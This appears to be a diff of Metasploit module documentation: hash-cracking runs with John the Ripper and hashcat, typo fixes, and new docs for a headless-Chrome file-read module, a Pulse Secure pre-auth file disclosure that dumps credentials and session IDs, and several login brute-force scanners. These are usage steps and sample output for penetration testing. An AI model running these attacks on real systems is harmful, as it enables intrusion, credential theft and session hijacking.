+to a wordlist and pot file to test various aspects of the cracker.
+
+```
+creds add user:lm_password ntlm:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c jtr:lm
+creds add user:lm2_password ntlm:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c jtr:lm
+creds add user:lm2_pot_password ntlm:e52cac67419fafe2fafe108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c jtr:lm
+creds add user:nt_password ntlm:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c jtr:nt
+echo "" > /root/.msf4/john.pot
+echo "\$LM\$E52CAC67419FAFE2:passwor" >> /root/.msf4/john.pot
+echo "\$LM\$FAFE108F3FA6CB6D:d" >> /root/.msf4/john.pot
+echo "test" > /tmp/wordlist
+echo "password" >> /tmp/wordlist
+```
+
+### John the Ripper
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_windows
+resource (hashes_hashcat.rb)> run
+[+] john Version Detected: 1.9.0-jumbo-1 OMP
+[*] Hashes Written out to /tmp/hashes_tmp20190531-32530-1bqr8cd
+[*] Wordlist file written out to /tmp/jtrtmp20190531-32530-1qjwpit
+[*] Checking lm hashes already cracked...
+[*] Cracking lm hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=sFX9A0yc --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=lm --wordlist=/tmp/jtrtmp20190531-32530-1qjwpit --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-32530-1bqr8cd
+Using default input encoding: UTF-8
+Using default target encoding: CP850
+Warning: poor OpenMP scalability for this hash type, consider --fork=8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+2g 0:00:00:00 DONE (2019-05-31 17:07) 200.0g/s 585500p/s 585500c/s 1756KC/s TEST3::..T1900
+Warning: passwords printed above might be partial and not be all those cracked
+Use the "--show --format=LM" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking lm hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=sFX9A0yc --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=lm --max-run-time=60 /tmp/hashes_tmp20190531-32530-1bqr8cd
+Using default input encoding: UTF-8
+Using default target encoding: CP850
+Warning: poor OpenMP scalability for this hash type, consider --fork=8
+Will run 8 OpenMP threads
+Proceeding with single, rules:Single
+Press 'q' or Ctrl-C to abort, almost any other key for status
+Almost done: Processing the remaining buffered candidate passwords, if any.
+Warning: Only 336 candidates buffered for the current salt, minimum 2048 needed for performance.
+Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
+1g 0:00:00:00 DONE 2/3 (2019-05-31 17:07) 50.00g/s 1774Kp/s 1774Kc/s 1774KC/s 123456..SEEKER0
+Warning: passwords printed above might be partial
+Use the "--show --format=LM" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking lm hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=sFX9A0yc --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=lm --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-32530-1bqr8cd
+Using default input encoding: UTF-8
+Using default target encoding: CP850
+[*] Cracking lm hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=sFX9A0yc --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=lm --wordlist=/tmp/jtrtmp20190531-32530-1qjwpit --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-32530-1bqr8cd
+Using default input encoding: UTF-8
+Using default target encoding: CP850
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1462   lm         lm_password       password          Single
+ 1463   lm         lm2_password      password          Single
+ 1464   lm         lm2_pot_password  password          Already Cracked/POT
+
+[*] Checking nt hashes already cracked...
+[*] Cracking nt hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=MUVWOAMV --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=nt --wordlist=/tmp/jtrtmp20190531-32530-1qjwpit --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-32530-1bqr8cd
+Using default input encoding: UTF-8
+Warning: no OpenMP support for this hash type, consider --fork=8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 17:07) 100.0g/s 19200p/s 19200c/s 19200C/s test3:::..Password12
+Warning: passwords printed above might not be all those cracked
+Use the "--show --format=NT" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking nt hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=MUVWOAMV --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=nt --max-run-time=60 /tmp/hashes_tmp20190531-32530-1bqr8cd
+Using default input encoding: UTF-8
+[*] Cracking nt hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=MUVWOAMV --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=nt --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-32530-1bqr8cd
+Using default input encoding: UTF-8
+[*] Cracking nt hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=MUVWOAMV --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=nt --wordlist=/tmp/jtrtmp20190531-32530-1qjwpit --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-32530-1bqr8cd
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1462   lm         lm_password       password          Single
+ 1463   lm         lm2_password      password          Single
+ 1464   lm         lm2_pot_password  password          Already Cracked/POT
+ 1465   nt         nt_password       password          Single
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public            private                                                            realm  private_type  JtR Format
+----  ------  -------  ------            -------                                                            -----  ------------  ----------
+                       lm_password       e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       lm2_password      e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       lm2_pot_password  e52cac67419fafe2fafe108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       nt_password       aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       lm2_pot_password  password                                                                  Password      
+                       lm_password       password                                                                  Password      
+                       lm2_password      password                                                                  Password      
+                       nt_password       password                                                                  Password
+```
+
+### Hashcat
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_windows
+resource (hashes_hashcat.rb)> set action hashcat
+action => hashcat
+resource (hashes_hashcat.rb)> run
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20190531-32645-186ea6l
+[*] Wordlist file written out to /tmp/jtrtmp20190531-32645-12pwixd
+[*] Checking lm hashes already cracked...
+[*] Cracking lm hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=i26VXnSy --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=3000 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-32645-186ea6l
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking lm hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=i26VXnSy --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=3000 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-32645-186ea6l /tmp/jtrtmp20190531-32645-12pwixd
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username      Cracked Password  Method
+ -----  ---------  --------      ----------------  ------
+ 1470   lm         lm_password   [notfound]D       Incremental
+ 1471   lm         lm2_password  [notfound]D       Incremental
+
+[*] Checking nt hashes already cracked...
+[*] Cracking nt hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=6lfDPvji --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1000 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-32645-186ea6l
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking nt hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=6lfDPvji --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1000 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-32645-186ea6l /tmp/jtrtmp20190531-32645-12pwixd
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1470   lm         lm_password       [notfound]D       Incremental
+ 1471   lm         lm2_password      [notfound]D       Incremental
+ 1472   nt         lm2_pot_password  password          Wordlist
+ 1473   nt         nt_password       password          Wordlist
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public            private                                                            realm  private_type  JtR Format
+----  ------  -------  ------            -------                                                            -----  ------------  ----------
+                       lm_password       e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       lm2_password      e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       lm2_pot_password  e52cac67419fafe2fafe108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       nt_password       aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       lm_password       [notfound]D                                                               Password      
+                       lm2_password      [notfound]D                                                               Password      
+                       lm_password       PASSWORD                                                                  Password      
+                       lm2_password      PASSWORD                                                                  Password      
+                       lm_password       password                                                                  Password      
+                       lm2_password      password                                                                  Password      
+                       lm2_pot_password  password                                                                  Password      
+                       nt_password       password                                                                  Password
+```

documentation/modules/auxiliary/analyze/jtr_linux.md

@@ -3,7 +3,7 @@
   This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Linux
   based password hashes, such as:
 
-  * `DES` based passwords  
+  * `DES` based passwords
   * `MD5` based passwords
   * `BSDi` based passwords
   * With `crypt` set to `true`:

documentation/modules/auxiliary/client/iec104/iec104.md

@@ -52,7 +52,7 @@ msf auxiliary(client/iec104/iec104) > set rhost 127.0.0.1
 rhost => 127.0.0.1
 msf auxiliary(client/iec104/iec104) > run
 
-[+] 127.0.0.1:2404 - Recieved STARTDT_ACT
+[+] 127.0.0.1:2404 - Received STARTDT_ACT
 [*] 127.0.0.1:2404 - Sending 104 command
 [+] 127.0.0.1:2404 -   Parsing response: Interrogation command (C_IC_NA_1)
 [+] 127.0.0.1:2404 -     TX: 0002 RX: 0000
@@ -77,7 +77,7 @@ msf auxiliary(client/iec104/iec104) > run
 [+] 127.0.0.1:2404 -     CauseTx: 0a (Termination Activation)
 [*] 127.0.0.1:2404 - operation ended
 [*] 127.0.0.1:2404 - Terminating Connection
-[+] 127.0.0.1:2404 - Recieved STOPDT_ACT
+[+] 127.0.0.1:2404 - Received STOPDT_ACT
 [*] Auxiliary module execution completed
 msf auxiliary(client/iec104/iec104) >
 ```
@@ -97,7 +97,7 @@ msf auxiliary(client/iec104/iec104) > set command_value 5
 command_value => 5
 msf auxiliary(client/iec104/iec104) > run
 
-[+] 127.0.0.1:2404 - Recieved STARTDT_ACT
+[+] 127.0.0.1:2404 - Received STARTDT_ACT
 [*] 127.0.0.1:2404 - Sending 104 command
 [+] 127.0.0.1:2404 -   Parsing response: Double command (C_DC_NA_1)
 [+] 127.0.0.1:2404 -     TX: 0002 RX: 0000
@@ -114,7 +114,7 @@ msf auxiliary(client/iec104/iec104) > run
 [+] 127.0.0.1:2404 -     IOA: 5 DCO: 0x05
 [*] 127.0.0.1:2404 - operation ended
 [*] 127.0.0.1:2404 - Terminating Connection
-[+] 127.0.0.1:2404 - Recieved STOPDT_ACT
+[+] 127.0.0.1:2404 - Received STOPDT_ACT
 [*] Auxiliary module execution completed
 msf auxiliary(client/iec104/iec104) >
 ```

documentation/modules/auxiliary/gather/chrome_debugger.md

@@ -0,0 +1,46 @@
+# Chrome Debugger Arbitary File Read / Abitrary Web Request Auxiliary Module
+
+This module takes advantage of misconfigured headless chrome sessions and either retrieves a specified file off the remote file system, or makes a web request from the remote machine.
+
+## Headless Chrome Sessions
+	
+A vulnerable Headless Chrome session can be started with the following command:
+
+```
+$ google-chrome --remote-debugging-port=9222 --headless --remote-debugging-address=0.0.0.0
+```
+
+This will start a webserver running on port 9222 for all network interfaces.
+
+## Verification Steps
+	
+1. Start `msfconsole`
+2. Execute `auxiliary/gather/chrome_debugger`
+3. Execute `set RHOST $REMOTE_ADDRESS`
+4. Execute `set RPORT 9222`
+5. Execute either `set FILEPATH $FILE_PATH_ON_REMOTE` or `set URL $URL_FROM_REMOTE`
+6. Execute `run`
+
+## Options
+
+* FILEPATH - The file path on the remote you wish to retrieve
+* URL - A URL you wish to fetch the contents of from the remote machine
+
+**Note:** One or the other must be set!
+
+## Example Run
+
+```
+[*] Attempting Connection to ws://192.168.20.168:9222/devtools/page/CF551031373306B35F961C6C0968DAEC
+[*] Opened connection
+[*] Attempting to load url file:///etc/passwd
+[*] Received Data
+[*] Sending request for data
+[*] Received Data
+[+] Retrieved resource
+[*] Auxiliary module execution completed
+```
+
+## Notes
+
+This can be useful for retrieving cloud metadata in certain scenarios.  Primarily this module targets developers.

documentation/modules/auxiliary/gather/pulse_secure_file_disclosure.md

@@ -0,0 +1,101 @@
+## Introduction
+
+This module exploits a pre-auth directory traversal in the Pulse Secure
+VPN server to dump an arbitrary file. Dumped files are stored in loot.
+
+If the `Automatic` action is set, plaintext and hashed credentials, as
+well as session IDs, will be dumped. Valid sessions can be hijacked by
+setting the `DSIG` browser cookie to a valid session ID.
+
+For the `Manual` action, please specify a file to dump via the `FILE`
+option. `/etc/passwd` will be dumped by default. If the `PRINT` option is
+set, file contents will be printed to the screen, with any unprintable
+characters replaced by a period.
+
+Please see related module exploit/linux/http/pulse_secure_cmd_exec for
+a post-auth exploit that can leverage the results from this module.
+
+## Actions
+
+```
+Name       Description
+----       -----------
+Automatic  Dump creds and sessions
+Manual     Dump an arbitrary file (FILE option)
+```
+
+## Options
+
+**FILE**
+
+Set this to the file you want to dump. The default is `/etc/passwd`.
+Valid only in manual mode.
+
+**PRINT**
+
+Whether to print file contents to the screen. Valid only in manual mode.
+
+## Usage
+
+Dumping creds and sessions in automatic mode:
+
+```
+msf5 auxiliary(gather/pulse_secure_file_disclosure) > run
+[*] Running module against [redacted]
+
+[*] Running in automatic mode
+[*] Dumping /data/runtime/mtmp/lmdb/dataa/data.mdb
+[+] /Users/wvu/.msf4/loot/20191029221840_default_[redacted]_PulseSecureVPN_273470.mdb
+[*] Dumping /data/runtime/mtmp/lmdb/randomVal/data.mdb
+[*] Parsing session IDs...
+[+] Session ID found: df502e6052d9002d8f02160af8bfd055
+[+] Session ID found: 249b470bd9bd1983f721ca950a74e61c
+[+] Session ID found: acbef5625
+[+] Session ID found: c145e683a
+[+] Session ID found: fc6c097dd
+[+] Session ID found: 249b470bd9bd1983f721ca950a74e61c
+[+] Session ID found: c145e683a17cfacb72a47eb8b2515c14
+[+] Session ID found: a7661751393e16fa253e97bd02dc2a4f
+[+] Session ID found: 7e78ab276afea3f00dfa41892c437156c699eff8
+[+] /Users/wvu/.msf4/loot/20191029221845_default_[redacted]_PulseSecureVPN_607925.mdb
+[*] Dumping /data/runtime/mtmp/system
+[+] /Users/wvu/.msf4/loot/20191029221851_default_[redacted]_PulseSecureVPN_530345.bin
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/pulse_secure_file_disclosure) > loot
+
+Loot
+====
+
+host         service  type                                        name                                        content                   info                   path
+----         -------  ----                                        ----                                        -------                   ----                   ----
+[redacted]            Pulse Secure VPN Arbitrary File Disclosure  /data/runtime/mtmp/lmdb/dataa/data.mdb      application/octet-stream  Plaintext credentials  /Users/wvu/.msf4/loot/20191029221840_default_[redacted]_PulseSecureVPN_273470.mdb
+[redacted]            Pulse Secure VPN Arbitrary File Disclosure  /data/runtime/mtmp/lmdb/randomVal/data.mdb  application/octet-stream  Session IDs            /Users/wvu/.msf4/loot/20191029221845_default_[redacted]_PulseSecureVPN_607925.mdb
+[redacted]            Pulse Secure VPN Arbitrary File Disclosure  /data/runtime/mtmp/system                   application/octet-stream  Hashed credentials     /Users/wvu/.msf4/loot/20191029221851_default_[redacted]_PulseSecureVPN_530345.bin
+
+msf5 auxiliary(gather/pulse_secure_file_disclosure) >
+```
+
+Dumping default `/etc/passwd` in manual mode:
+
+```
+msf5 auxiliary(gather/pulse_secure_file_disclosure) > set action Manual
+action => Manual
+msf5 auxiliary(gather/pulse_secure_file_disclosure) > run
+[*] Running module against [redacted]
+
+[*] Running in manual mode
+[*] Dumping /etc/passwd
+root:x:0:0:root:/:/bin/bash
+nfast:x:0:0:nfast:/:/bin/bash
+bin:x:1:1:bin:/:
+nobody:x:99:99:Nobody:/:
+dns:x:98:98:DNS:/:
+term:x:97:97:Telnet/SSH:/:
+web80:x:96:96:Port 80 web:/:
+rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
+postgres:x:102:102:PostgreSQL User:/:
+
+[+] /Users/wvu/.msf4/loot/20191029222949_default_[redacted]_PulseSecureVPN_073170.bin
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/pulse_secure_file_disclosure) >
+```

documentation/modules/auxiliary/scanner/acpp/login.md

@@ -0,0 +1,28 @@
+## Vulnerable Application
+
+ACPP is an undocumented and proprietary Apple protocol found in Airport products which protects the credentials used to administer the device. This module attempts exploit a weak encryption mechanism (fixed XOR key) by brute forcing the password via a dictionary attack or specific password.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/acpp/login)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use auxiliary/scanner/acpp/login`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+### Apple AirPort Extreme 802.11g
+
+  ```
+  msf > use auxiliary/scanner/acpp/login
+  msf auxiliary(scanner/acpp/login) > show options
+  msf auxiliary(scanner/acpp/login) > set RHOSTS 1.1.1.1
+      RHOSTS => 1.1.1.1
+  msf auxiliary(scanner/acpp/login) > set PASSWORD myPassword
+      PASSWORD => myPassword
+  msf auxiliary(scanner/acpp/login) > run
+    [*] 1.1.1.1:5009 - 1.1.1.1:5009 - Starting ACPP login sweep
+    [*] 1.1.1.1:5009 - 1.1.1.1:5009 - ACPP Login Successful: myPassword
+  ```

documentation/modules/auxiliary/scanner/afp/afp_login.md

@@ -0,0 +1,45 @@
+## Vulnerable Application
+
+Apple Filing Protocol (AFP) is Apple's file sharing protocol similar to SMB, and NFS. This module attempts to brute force authentication credentials for AFP.
+
+References:
+
+* [AFP_Reference](https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html)
+* [AFP_Security](https://developer.apple.com/library/mac/documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html)
+
+### Kali 2019.3 Install Instructions
+
+1. `sudo apt-get install netatalk`
+2. edit `/etc/default/netatalk` and add the following lines:
+
+    ```
+    ATALKD_RUN=no
+    PAPD_RUN=no
+    CNID_METAD_RUN=yes
+    AFPD_RUN=yes
+    TIMELORD_RUN=no
+    A2BOOT_RUN=no
+    ```
+
+3. Restart the service: `sudo /etc/init.d/netatalk restart`
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/afp/afp_login`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+### A run on Kali Linux 2019.3 and Netatalk 3.1.12
+
+  ```
+  msf > use modules/auxiliary/scanner/afp/afp_login
+  msf auxiliary(scanner/afp/afp_login) > set USERNAME tuser
+  msf auxiliary(scanner/afp/afp_login) > set PASSWORD myPassword
+  msf auxiliary(scanner/afp/afp_login) > set RHOST 172.17.0.2
+  msf auxiliary(scanner/afp/afp_login) > run
+    [*] 172.17.0.2:548 - Scanning IP: 172.17.0.2
+    [*] 172.17.0.2:548 - Login Successful: tuser:myPassword
+  ```

documentation/modules/auxiliary/scanner/afp/afp_server_info.md

@@ -3,10 +3,11 @@
 Apple Filing Protocol (AFP) is Apple's file sharing protocol similar to SMB, and NFS.  This module will gather information about the service.
 Netatalk is a Linux implementation of AFP.
 
-The following was done on Ubuntu 16.04, and is largely base on [missingreadme.wordpress.com](https://missingreadme.wordpress.com/2010/05/08/how-to-set-up-afp-filesharing-on-ubuntu/):
-  
+The following was done on Ubuntu 16.04, and is largely based on [missingreadme.wordpress.com](https://missingreadme.wordpress.com/2010/05/08/how-to-set-up-afp-filesharing-on-ubuntu/):
+
   1. `sudo apt-get install netatalk`
   2. edit `/etc/default/netatalk` and add the following lines:
+
     ```
     ATALKD_RUN=no
     PAPD_RUN=no
@@ -15,6 +16,7 @@ The following was done on Ubuntu 16.04, and is largely base on [missingreadme.wo
     TIMELORD_RUN=no
     A2BOOT_RUN=no
     ```
+
   3. Restart the service: `sudo /etc/init.d/netatalk restart`
 
 ## Verification Steps
@@ -22,40 +24,41 @@ The following was done on Ubuntu 16.04, and is largely base on [missingreadme.wo
   1. Install and configure afp (or netatalk in a Linux environment)
   2. Start msfconsole
   3. Do: `auxiliary/scanner/afp/afp_server_info`
-  4. Do: `run`
+  4. Do: `set RHOSTS [ip]`
+  5. Do: `run`
 
 ## Scenarios
 
-  A run against the configuration from these docs
+### Ubuntu 16.04 with Netatalk 2.2.5
 
   ```
-  msf5 auxiliary(scanner/acpp/login) > use auxiliary/scanner/afp/afp_server_info 
+  msf5 auxiliary(scanner/acpp/login) > use auxiliary/scanner/afp/afp_server_info
   msf5 auxiliary(scanner/afp/afp_server_info) > set rhosts 1.1.1.1
   rhosts => 1.1.1.1
   msf5 auxiliary(scanner/afp/afp_server_info) > run
-  
+
   [*] 1.1.1.1:548 - AFP 1.1.1.1 Scanning...
   [*] 1.1.1.1:548 - AFP 1.1.1.1:548:548 AFP:
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548 Server Name: ubuntu 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Flags: 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Super Client: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UUIDs: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UTF8 Server Name: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Open Directory: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Reconnect: false 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Notifications: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  TCP/IP: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Signature: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Messages: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Saving Prohibited: false 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Changing: false 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Copy File: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Machine Type: Netatalk2.2.5 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  AFP Versions: AFP2.2, AFPX03, AFP3.1, AFP3.2, AFP3.3 
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548 Server Name: ubuntu
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Flags:
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Super Client: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UUIDs: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UTF8 Server Name: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Open Directory: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Reconnect: false
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Notifications: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  TCP/IP: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Signature: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Messages: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Saving Prohibited: false
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Changing: false
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Copy File: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Machine Type: Netatalk2.2.5
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  AFP Versions: AFP2.2, AFPX03, AFP3.1, AFP3.2, AFP3.3
   [*] 1.1.1.1:548 - AFP 1.1.1.1:548  UAMs: Cleartxt Passwrd, DHX2
   [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Signature: 975394e16633312406281959287fcbd9
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Network Address: 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  1.1.1.1 
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Network Address:
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  1.1.1.1
   [*] 1.1.1.1:548 - AFP 1.1.1.1:548   UTF8 Server Name: ubuntu
   [*] 1.1.1.1:548 - Scanned 1 of 1 hosts (100% complete)
   [*] Auxiliary module execution completed

documentation/modules/auxiliary/scanner/db2/db2_auth.md

@@ -0,0 +1,32 @@
+## Vulnerable Application
+
+This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the `USER_FILE`, `PASS_FILE`, and `USERPASS_FILE` options.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/db2/db2_auth)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use auxiliary/scanner/db2/db2_auth`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+###  A run on Kali Linux 2019.3 and DB2 11.5.0.0a
+
+    ```
+    msf > use auxiliary/scanner/db2/db2_auth
+    msf auxiliary/scanner/db2/db2_auth) > show options
+    msf auxiliary/scanner/db2/db2_auth) > set USERNAME db2inst1
+    msf auxiliary/scanner/db2/db2_auth) > set PASSWORD db2pass
+    msf auxiliary(scanner/db2/db2_auth) > set DATABASE testdb
+    msf auxiliary/scanner/db2/db2_auth) > set RHOST 172.17.0.2
+    msf auxiliary/scanner/db2/db2_auth) > run
+      [-] 172.17.0.2:50000      - 172.17.0.2:50000 - LOGIN FAILED: db2inst1:db2inst1@testdb (Incorrect: )
+      [-] 172.17.0.2:50000      - 172.17.0.2:50000 - LOGIN FAILED: db2inst1:dasusr1@testdb (Incorrect: )
+      [-] 172.17.0.2:50000      - 172.17.0.2:50000 - LOGIN FAILED: db2inst1:db2fenc1@testdb (Incorrect: )
+      [*] 172.17.0.2:50000      - Login Successful: db2inst1:db2pass
